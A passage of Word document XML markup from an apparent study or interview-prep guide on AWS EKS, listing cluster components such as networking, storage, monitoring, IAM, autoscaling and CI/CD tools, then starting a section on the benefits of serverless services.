          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: AWS VPC-native networking for pods (each pod gets a VPC IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB1218"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CoreDNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cluster DNS for service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B20267"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Ingress Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For exposing services via HTTP/HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C130189" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Popular: NGINX Ingress, AWS ALB Ingress Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EAFA0" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A145235"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ELB / ALB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration via Service of type LoadBalancer or Ingress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2A73A" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F62C19"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EBS CSI Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Persistent volumes via EBS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39066E42"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EFS CSI Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shared volumes via EFS (good for stateful apps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0B624" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A185D97"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CloudWatch Container Insights</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Metrics and logs for containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB53E1"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Prometheus + Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Custom metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DB966"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Fluent Bit/Fluentd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Logging agents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E7604" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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IAM Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622249DF"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IAM Roles for Service Accounts (IRSA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fine-grained IAM access for pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878E8B8" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184CC96"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Network Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Control traffic between pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA965FE"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Pod Security Policies / OPA Gatekeeper / Kyverno</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Policy enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA9066"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Secrets Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes Secrets or integrate with AWS Secrets Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37426BB4" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6"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Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A9948"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Cluster Autoscaler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds/removes worker nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F471E2C"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Horizontal Pod Autoscaler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Scales pods based on CPU/memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D4E9C"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Vertical Pod Autoscaler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adjusts resource requests for pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D7B3B" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>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CI/CD Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D67FD" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integrated with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB41C9" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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CodePipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D776C92" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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rgo CD / Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for GitOps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D11DA" w14:textId="77777777" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00C632D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>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Helm</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for packaging Kubernetes apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A464486" w14:textId="3A05C5D3" w:rsidR="00D61854" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D6185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B4D92CF">
          <v:rect id="_x0000_i3463" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45655DD3" w14:textId="36F661A4" w:rsidR="003002AA" w:rsidRPr="00CE4B95" w:rsidRDefault="003002AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="854" w:name="_Toc196308334"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the benefit of Serverless services? Is EKS serverless?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="854"/>
    </w:p>
    <w:p w14:paraId="5CE39845" w14:textId="41D2C2BC" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Benefits of Serverless Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22556BD4" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Serverless computing means </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you don't manage the server infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—the cloud provider does. Here's why it's beneficial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421678E9" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4CDBBA77">
          <v:rect id="_x0000_i3464" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732954C3" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. No Server Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5C00B" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You don’t have to provision, scale, or manage servers. Just focus on code or configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C51B92" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF8503" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Automatically scales up/down based on usage (requests, events, etc.)—great for unpredictable workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E76D0" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Pay-as-You-Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150108A5" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You pay </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only for actual usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., requests handled, compute time), not for idle time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B557D0" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Faster Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6B768" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You focus purely on functionality—great for microservices or event-driven apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6D964" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E852E" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Built-in fault tolerance, availability, and scalability by the cloud provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB803DD" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="248D49B0">
          <v:rect id="_x0000_i3465" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78FA12" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
